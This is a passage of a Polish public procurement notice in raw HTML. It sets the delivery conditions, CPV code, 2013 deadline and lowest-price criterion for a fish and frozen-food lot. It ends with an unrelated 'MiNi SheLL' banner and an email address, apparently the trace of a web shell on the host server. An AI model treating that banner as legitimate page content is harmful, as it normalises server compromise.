Zestawienie produktów i ich ilość zawarta jest w odpowiednich specyfikacjach stanowiących zapotrzebowanie roczne. Oferent powinien przede wszystkim ustalić ceny jednostkowe brutto, wartość ogólną brutto, wielkość oferowanego opakowania, ilość opakowań oraz nazwę handlową. Realizacja zamówienia odbywać się będzie sukcesywnie do końca 2013r. Dostawca zobowiązany jest do dostarczania produktów własnym transportem i na własny koszt wraz z rozładunkiem. Wszelkie dostarczane produkty żywnościowe oraz warunki dostawy muszą spełniać wymagania i procedury niezbędne do zapewnienia bezpieczeństwa żywności i żywienia zgodnie z obowiązującymi przepisami dotyczącymi bezpieczeństwa żywności i żywienia. Sposób wydania i odebrania przedmiotu umowy powinien zapewnić mu całość i nienaruszalność, a w szczególności sposób opakowania i przewozu powinien odpowiadać właściwościom rzeczy. Wykonawca w okresie obowiązywania niniejszej umowy będzie jedynym dostawcą. Przy każdej dostawie należy dostarczyć fakturę za dostarczony towar. Gramatura podana w ofercie jest obowiązkowa. Dopuszcza się zmianę w uzgodnieniu z zamawiającym. Ceny jednostkowe zostaną w takim przypadku przeliczone proporcjonalnie do cen podanych w ofercie. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w poszczególnych asortymentach w zależności od potrzeb. Ceny jednostkowe podane w ofercie są stałe i niezmienne podczas trwania umowy. 
Szczegółowy zakres określa załącznik nr 1g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa  ryb i mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Informacje i wymagania dodatkowe.
Wymaga się, aby dostarczone produkty posiadały minimum 14 dniowy termin przydatności do spożycia, licząc od dnia dostawy, chyba że producent ze względu na specyfikę produktu, przewiduje krótsze terminy. 
 Warunki i zasady realizacji zamówienia:
Zestawienie produktów i ich ilość zawarta jest w odpowiednich specyfikacjach stanowiących zapotrzebowanie roczne. Oferent powinien przede wszystkim ustalić ceny jednostkowe brutto, wartość ogólną brutto, wielkość oferowanego opakowania, ilość opakowań oraz nazwę handlową. Realizacja zamówienia odbywać się będzie sukcesywnie do końca 2013r. Dostawca zobowiązany jest do dostarczania produktów własnym transportem i na własny koszt wraz z rozładunkiem. Wszelkie dostarczane produkty żywnościowe oraz warunki dostawy muszą spełniać wymagania i procedury niezbędne do zapewnienia bezpieczeństwa żywności i żywienia zgodnie z obowiązującymi przepisami dotyczącymi bezpieczeństwa żywności i żywienia. Sposób wydania i odebrania przedmiotu umowy powinien zapewnić mu całość i nienaruszalność, a w szczególności sposób opakowania i przewozu powinien odpowiadać właściwościom rzeczy. Wykonawca w okresie obowiązywania niniejszej umowy będzie jedynym dostawcą. Przy każdej dostawie należy dostarczyć fakturę za dostarczony towar. Gramatura podana w ofercie jest obowiązkowa. Dopuszcza się zmianę w uzgodnieniu z zamawiającym. Ceny jednostkowe zostaną w takim przypadku przeliczone proporcjonalnie do cen podanych w ofercie. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w poszczególnych asortymentach w zależności od potrzeb. Ceny jednostkowe podane w ofercie są stałe i niezmienne podczas trwania umowy. 
Szczegółowy opis określa załącznik 1h.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com